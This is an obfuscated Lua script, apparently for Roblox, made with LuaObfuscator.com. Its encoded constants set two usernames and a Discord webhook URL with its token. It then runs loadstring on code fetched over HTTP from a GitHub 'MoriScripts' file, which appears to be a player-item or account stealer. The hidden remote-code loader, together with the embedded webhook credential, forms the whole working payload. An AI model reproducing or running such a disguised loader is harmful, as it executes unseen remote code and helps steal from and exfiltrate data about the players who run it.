--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.16) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==5) then v27=v24;v28=nil;function v28(...)return {...},v12("#",...);end v18=6;end if (v18==1) then v21=nil;function v21(v31,v32,v33)if v33 then local v83=(v31/((5 -3)^(v32-(2 -1))))%((3 -1)^(((v33-(2 -1)) -(v32-((1497 -(282 + 595)) -(555 + 64)))) + (932 -(857 + 74)))) ;return v83-(v83%(569 -(367 + 201))) ;else local v84=(929 -((1851 -(1523 + 114)) + 713))^(v32-(1 + 0)) ;return (((v31%(v84 + v84))>=v84) and (1 + 0 + (0 -0))) or 0 ;end end v22=nil;v18=2;end if (v18==3) then v24=nil;function v24()local v34,v35,v36,v37=v1(v16,v19,v19 + (1068 -(68 + 997)) );v19=v19 + (1274 -(226 + 1044)) ;return (v37 * ((16200264 + 56854510) -56277558)) + (v36 * (65653 -(32 + (1042 -(892 + 65))))) + (v35 * (251 + 5)) + v34 ;end v25=nil;v18=4;end if (v18==6) then v29=nil;function v29()local v38=0;local v39;local v40;local v41;local v42;local v43;local v44;local v45;while true do if (v38~=(3 -1)) then else v43=nil;v44=nil;v38=3;end if (v38==(0 + 0)) then local v89=0;while true do if (v89~=1) then else v38=1;break;end if (v89~=(402 -(108 + 294))) then else v39=0;v40=nil;v89=1;end end end if (v38==1) then v41=nil;v42=nil;v38=2;end if (v38==(1492 -(570 + 919))) then v45=nil;while true do local v90=0 -0 ;while true do if (v90~=(811 -(569 + 242))) then else local v96=0;while true do if (v96~=0) then else if (v39==2) then local v119=0 -0 ;local v120;local v121;while true do if (v119==(1 + 0)) then while true do if (v120==0) then v121=1024 -(706 + 318) ;while true do if (v121~=(1252 -(721 + 530))) then else for v173=1272 -(945 + 326) ,v24() do local v174=0;local v175;local v176;local v177;local v178;while true do if (v174==2) then while true do if (0==v175) then v176=0;v177=nil;v175=2 -1 ;end if (v175==1) then v178=nil;while true do if (1~=v176) then else while true do if (v177~=0) then else v178=v22();if (v21(v178,1,1 + 0 )~=0) then else local v194=0;local v195;local v196;local v197;local v198;local v199;while true do if (v194~=(700 -(271 + 429))) then else v195=0;v196=nil;v194=1 + 0 ;end if (v194~=(1502 -(1408 + 92))) then else v199=nil;while true do if (v195==(1086 -(461 + 625))) then local v203=1288 -(993 + 295) ;while true do if (v203==1) then v195=1;break;end if (v203~=0) then else v196=0 + 0 ;v197=nil;v203=1;end end end if (1~=v195) then else local v204=1171 -(418 + 753) ;while true do if (v204==(0 + 0)) then v198=nil;v199=nil;v204=1;end if (v204==(1 + 0)) then v195=2;break;end end end if (v195==(1 + 1)) then while true do if (v196==3) then if (v21(v198,1 + 2 ,532 -(406 + 123) )==1) then v199[4]=v45[v199[1773 -(1749 + 20) ]];end v40[v173]=v199;break;end if (v196~=(1 + 1)) then else local v206=1322 -(1249 + 73) ;local v207;local v208;while true do if ((0 + 0)==v206) then v207=1145 -(466 + 679) ;v208=nil;v206=1;end if (v206~=(2 -1)) then else while true do if (v207==(0 -0)) then v208=0;while true do if (0~=v208) then else if (v21(v198,1901 -(106 + 1794) ,1 + 0 )==1) then v199[1 + 1 ]=v45[v199[2]];end if (v21(v198,2,2)~=(2 -1)) then else v199[3]=v45[v199[7 -4 ]];end v208=1;end if (v208~=(115 -(4 + 110))) then else v196=3;break;end end break;end end break;end end end if (v196==(585 -(57 + 527))) then local v209=1427 -(41 + 1386) ;local v210;local v211;while true do if (v209==0) then v210=0;v211=nil;v209=1;end if (v209~=1) then else while true do if ((103 -(17 + 86))==v210) then v211=0 + 0 ;while true do if ((1 -0)~=v211) then else v196=5 -3 ;break;end if (v211~=0) then else local v218=166 -(122 + 44) ;local v219;while true do if (v218==(0 -0)) then v219=0;while true do if (v219~=0) then else local v224=0 -0 ;while true do if (v224==1) then v219=1 + 0 ;break;end if (v224==0) then v199={v23(),v23(),nil,nil};if (v197==0) then local v225=65 -(30 + 35) ;local v226;local v227;while true do if (v225==(1 + 0)) then while true do if (v226==(1257 -(1043 + 214))) then v227=0;while true do if (v227==(0 -0)) then v199[3]=v23();v199[4]=v23();break;end end break;end end break;end if (v225==0) then v226=0;v227=nil;v225=1;end end elseif (v197==1) then v199[1215 -(323 + 889) ]=v24();elseif (v197==2) then v199[7 -4 ]=v24() -(2^16) ;elseif (v197~=3) then else local v230=580 -(361 + 219) ;local v231;local v232;local v233;while true do if (v230==(321 -(53 + 267))) then v233=nil;while true do if (v231==1) then while true do if ((0 + 0)==v232) then v233=413 -(15 + 398) ;while true do if (v233==(982 -(18 + 964))) then v199[3]=v24() -(2^(60 -44)) ;v199[4]=v23();break;end end break;end end break;end if (v231~=(0 + 0)) then else local v236=0 + 0 ;while true do if ((851 -(20 + 830))==v236) then v231=1;break;end if (v236==0) then v232=0;v233=nil;v236=1 + 0 ;end end end end break;end if (v230~=(126 -(116 + 10))) then else v231=0 + 0 ;v232=nil;v230=739 -(542 + 196) ;end end end v224=1 -0 ;end end end if ((1 + 0)~=v219) then else v211=1;break;end end break;end end end end break;end end break;end end end if (v196~=(0 + 0)) then else local v212=0 + 0 ;while true do if (v212~=0) then else local v216=0;while true do if ((0 -0)==v216) then local v217=0;while true do if ((2 -1)~=v217) then else v216=1552 -(1126 + 425) ;break;end if (v217==0) then v197=v21(v178,2,3);v198=v21(v178,409 -(118 + 287) ,6);v217=3 -2 ;end end end if (v216==(1122 -(118 + 1003))) then v212=1;break;end end end if (v212==(2 -1)) then v196=1;break;end end end end break;end end break;end if ((378 -(142 + 235))==v194) then v197=nil;v198=nil;v194=2;end end end break;end end break;end if (v176~=(0 -0)) then else local v188=0 + 0 ;while true do if ((977 -(553 + 424))==v188) then v177=0 -0 ;v178=nil;v188=1;end if (v188==1) then v176=1 + 0 ;break;end end end end break;end end break;end if (v174~=(0 + 0)) then else v175=0 + 0 ;v176=nil;v174=1 + 0 ;end if (v174==1) then v177=nil;v178=nil;v174=2 + 0 ;end end end v39=6 -3 ;break;end if (v121==0) then local v172=0;while true do if (v172==1) then v121=1;break;end if (v172~=0) then else for v182=1,v44 do local v183=0 -0 ;local v184;local v185;local v186;local v187;while true do if (2~=v183) then else while true do if (v184~=(0 -0)) then else local v189=0;local v190;while true do if (v189==(0 + 0)) then v190=0;while true do if (v190==(4 -3)) then v184=754 -(239 + 514) ;break;end if (v190~=0) then else local v200=0;while true do if (v200~=0) then else v185=0 + 0 ;v186=nil;v200=1330 -(797 + 532) ;end if (v200~=(1 + 0)) then else v190=1;break;end end end end break;end end end if (v184==(1 + 0)) then v187=nil;while true do if (v185==(0 -0)) then local v191=1202 -(373 + 829) ;local v192;while true do if ((731 -(476 + 255))~=v191) then else v192=1130 -(369 + 761) ;while true do if (v192~=1) then else v185=1;break;end if (v192==(0 + 0)) then local v201=0;local v202;while true do if (v201~=0) then else v202=0;while true do if (v202==(1 -0)) then v192=1 -0 ;break;end if ((238 -(64 + 174))==v202) then local v213=0;while true do if (v213==1) then v202=1 + 0 ;break;end if ((0 -0)~=v213) then else v186=v22();v187=nil;v213=337 -(144 + 192) ;end end end end break;end end end end break;end end end if (v185==1) then if (v186==1) then v187=v22()~=(216 -(42 + 174)) ;elseif (v186==(2 + 0)) then v187=v25();elseif (v186==(3 + 0)) then v187=v26();end v45[v182]=v187;break;end end break;end end break;end if (v183==(1 + 0)) then v186=nil;v187=nil;v183=2;end if (v183==(1504 -(363 + 1141))) then v184=1580 -(1183 + 397) ;v185=nil;v183=2 -1 ;end end end v43[3]=v22();v172=1 + 0 ;end end end end break;end end break;end if (v119==(0 + 0)) then v120=0;v121=nil;v119=1976 -(1913 + 62) ;end end end if (v39==0) then local v122=0;local v123;while true do if (v122==(0 + 0)) then v123=0 -0 ;while true do if (v123~=(1933 -(565 + 1368))) then else local v168=0;local v169;while true do if (v168==0) then v169=0;while true do if (v169==(0 -0)) then v40={};v41={};v169=1;end if (v169==1) then v123=1;break;end end break;end end end if (v123~=(1662 -(1477 + 184))) then else v42={};v39=1;break;end end break;end end end v96=1 -0 ;end if (1~=v96) then else v90=1 + 0 ;break;end end end if (v90~=(857 -(564 + 292))) then else if ((4 -1)==v39) then local v97=0 -0 ;local v98;while true do if ((304 -(244 + 60))~=v97) then else v98=0 + 0 ;while true do if (v98==(476 -(41 + 435))) then local v155=0;local v156;while true do if (v155==0) then v156=1001 -(938 + 63) ;while true do if ((0 + 0)==v156) then for v179=1126 -(936 + 189) ,v24() do v41[v179-(1 + 0) ]=v29();end return v43;end end break;end end end end break;end end end if (v39==1) then local v99=1613 -(1565 + 48) ;local v100;while true do if (v99~=0) then else v100=0 + 0 ;while true do if (v100~=0) then else local v157=0;while true do if (v157==0) then v43={v40,v41,nil,v42};v44=v24();v157=1;end if (v157==1) then v100=1139 -(782 + 356) ;break;end end end if (v100~=(268 -(176 + 91))) then else v45={};v39=2;break;end end break;end end end break;end end end break;end end end v30=nil;v18=7;end if (v18==4) then function v25()local v46=0 -0 ;local v47;local v48;local v49;local v50;local v51;local v52;while true do if (v46==(1 -0)) then v49=1093 -(975 + 98 + 19) ;v50=(v21(v48,1876 -(157 + 1718) ,17 + 3 ) * (((11 -5) -4)^32)) + v47 ;v46=6 -4 ;end if (v46==(1021 -(697 + 321))) then if (v51==(0 -(0 -0))) then if (v50==((1205 -(902 + 303)) -0)) then return v52 * (0 -0) ;else v51=1 + 0 ;v49=0 -0 ;end elseif (v51==(5487 -3440)) then return ((v50==0) and (v52 * ((1228 -(322 + 905))/(611 -(602 + 9))))) or (v52 * NaN) ;end return v8(v52,v51-1023 ) * (v49 + (v50/(2^(113 -61)))) ;end if ((1189 -(449 + 740))==v46) then v47=v24();v48=v24();v46=873 -(826 + 46) ;end if (v46==((2285 -1336) -(245 + 61 + 641))) then v51=v21(v48,66 -45 ,10 + 21 );v52=((v21(v48,32)==1) and  -(1899 -((1950 -(1121 + 569)) + 1638))) or (441 -(382 + 58)) ;v46=9 -6 ;end end end v26=nil;function v26(v53)local v54;if  not v53 then v53=v24();if (v53==(214 -(22 + 192))) then return "";end end v54=v3(v16,v19,(v19 + v53) -1 );v19=v19 + v53 ;local v55={};for v67=684 -(483 + 200) , #v54 do v55[v67]=v2(v1(v3(v54,v67,v67)));end return v6(v55);end v18=5;end if (v18==2) then function v22()local v56=v1(v16,v19,v19);v19=v19 + 1 ;return v56;end v23=nil;function v23()local v57=0;local v58;local v59;while true do if (v57==(1463 -(1404 + 59))) then v58,v59=v1(v16,v19,v19 + (5 -(6 -3)) );v19=v19 + (2 -0) ;v57=766 -(468 + 297) ;end if (v57==(563 -(334 + 228))) then return (v59 * ((1565 -702) -607)) + v58 ;end end end v18=3;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v60)if (v1(v60,2)==79) then v20=v0(v3(v60,1,1));return "";else local v85=v2(v0(v60,16));if v20 then local v91=v5(v85,v20);v20=nil;return v91;else return v85;end end end);v18=1;end if (v18==7) then function v30(v61,v62,v63)local v64=v61[1];local v65=v61[2];local v66=v61[3];return function(...)local v69=v64;local v70=v65;local v71=v66;local v72=v28;local v73=1;local v74= -1;local v75={};local v76={...};local v77=v12("#",...) -1 ;local v78={};local v79={};for v86=0,v77 do if (v86>=v71) then v75[v86-v71 ]=v76[v86 + 1 ];else v79[v86]=v76[v86 + 1 ];end end local v80=(v77-v71) + 1 ;local v81;local v82;while true do v81=v69[v73];v82=v81[1];if (v82<=10) then if (v82<=4) then if (v82<=1) then if (v82==0) then v63[v81[3]]=v79[v81[2]];else v79[v81[2]]=v81[3];end elseif (v82<=2) then if (v79[v81[2]]==v81[4]) then v73=v73 + 1 ;else v73=v81[3];end elseif (v82>3) then v79[v81[2]]();else local v125=0;local v126;while true do if (v125==0) then v126=v81[2];v79[v126]=v79[v126](v13(v79,v126 + 1 ,v74));break;end end end elseif (v82<=7) then if (v82<=5) then v79[v81[2]]=v81[3]~=0 ;elseif (v82>6) then if (v81[3]=="_ENV") then v79[v81[2]]=v63;else v79[v81[2]]=v63[v81[3]];end else v63[v81[3]]=v79[v81[2]];end elseif (v82<=8) then local v106=v81[2];local v107,v108=v72(v79[v106](v13(v79,v106 + 1 ,v81[3])));v74=(v108 + v106) -1 ;local v109=0;for v116=v106,v74 do v109=v109 + 1 ;v79[v116]=v107[v109];end elseif (v82>9) then if (v81[3]=="_ENV") then v79[v81[2]]=v63;else v79[v81[2]]=v63[v81[3]];end else local v129=0;local v130;local v131;while true do if (v129==0) then v130=v81[2];v131=v79[v81[3]];v129=1;end if (v129==1) then v79[v130 + 1 ]=v131;v79[v130]=v131[v81[4]];break;end end end elseif (v82<=15) then if (v82<=12) then if (v82>11) then local v110=0;local v111;local v112;while true do if (v110==1) then v79[v111 + 1 ]=v112;v79[v111]=v112[v81[4]];break;end if (v110==0) then v111=v81[2];v112=v79[v81[3]];v110=1;end end else v79[v81[2]]();end elseif (v82<=13) then v79[v81[2]]=v81[3]~=0 ;elseif (v82>14) then v73=v81[3];else v73=v81[3];end elseif (v82<=18) then if (v82<=16) then do return;end elseif (v82==17) then v79[v81[2]]=v81[3];else local v136=0;local v137;local v138;local v139;local v140;while true do if (v136==1) then v74=(v139 + v137) -1 ;v140=0;v136=2;end if (v136==2) then for v166=v137,v74 do local v167=0;while true do if (0==v167) then v140=v140 + 1 ;v79[v166]=v138[v140];break;end end end break;end if (v136==0) then v137=v81[2];v138,v139=v72(v79[v137](v13(v79,v137 + 1 ,v81[3])));v136=1;end end end elseif (v82<=19) then local v114=0;local v115;while true do if (v114==0) then v115=v81[2];v79[v115]=v79[v115](v13(v79,v115 + 1 ,v74));break;end end elseif (v82==20) then do return;end elseif (v79[v81[2]]==v81[4]) then v73=v73 + 1 ;else v73=v81[3];end v73=v73 + 1 ;end end;end return v30(v29(),{},v17)(...);end end end v15("LOL!0C3O00028O00026O00F03F03093O00557365724E616D653203093O00686574726F37383033030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403463O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F4D6F7269536372697074732F6D61696E2F4D6F72695363726970747303083O00557365724E616D6503063O006D797872396E03073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O31363832343039313338353638372O3631362F6A68525A4B47694C68316B56717A694562756B417969634C516E74566F4A654B58616E2O64365475472O64476A4B476E41334852614764757045754D3952534C4645304D00173O0012013O00013O0026023O000E0001000200040E3O000E0001001201000100043O00122O000100033O001207000100053O001207000200063O002009000200020007001201000400084O000D000500014O0012000200054O000300013O00022O000B00010001000100040E3O001600010026023O00010001000100040E3O000100010012010001000A3O00122O000100093O0012010001000C3O00122O0001000B3O0012013O00023O00040E3O000100012O00103O00017O00",v9(),...);